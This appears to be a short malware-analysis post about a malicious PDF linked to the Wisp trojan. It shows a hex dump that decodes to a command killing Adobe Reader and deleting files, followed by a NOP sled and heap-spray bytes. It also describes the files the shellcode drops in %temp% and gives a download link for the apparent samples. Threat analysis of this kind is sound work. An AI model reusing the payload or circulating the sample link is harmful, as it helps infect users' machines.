58586014   37323120 

58586018   302E302E 

5858601C   2D20312E

58586020   2033206E 

58586024   61742026 

58586028   696B6B73

5858602C   2F206C6C

58586030   41206D69

58586034   626F7263  rt3d.626F7263

58586038   652E7461

5858603C   2F206578

58586040   20262066 

58586044   6B736174

58586048   6C6C696B

5858604C   6D692F20

58586050   72634120

58586054   3364526F 

58586058   78652E32

5858605C   662F2065

58586060   22202620  Annots.22202620

58586064   00220000

58586068   90900000

5858606C   0C909090

58586070   0C0C0C0C


shellcode drops in %temp% directory ~.exe , ~temp.bat, pdf named same as pdf

 download files = http://www.mediafire.com/?va3mw7fe5vqygha

----------------

wisp trojan?

https://www.microsoft.com/security/portal/Threat/Encyclopedia/Entry.aspx?Name=Trojan:Win32/Wisp.A

http://www.threatexpert.com/report.aspx?md5=9f0cefe847174185030a1f027b3813ec

http://www.securityhome.eu/malware/malware.php?mal_id=897505004b9a591d6da897.20308017


refrence : news.softpedia.com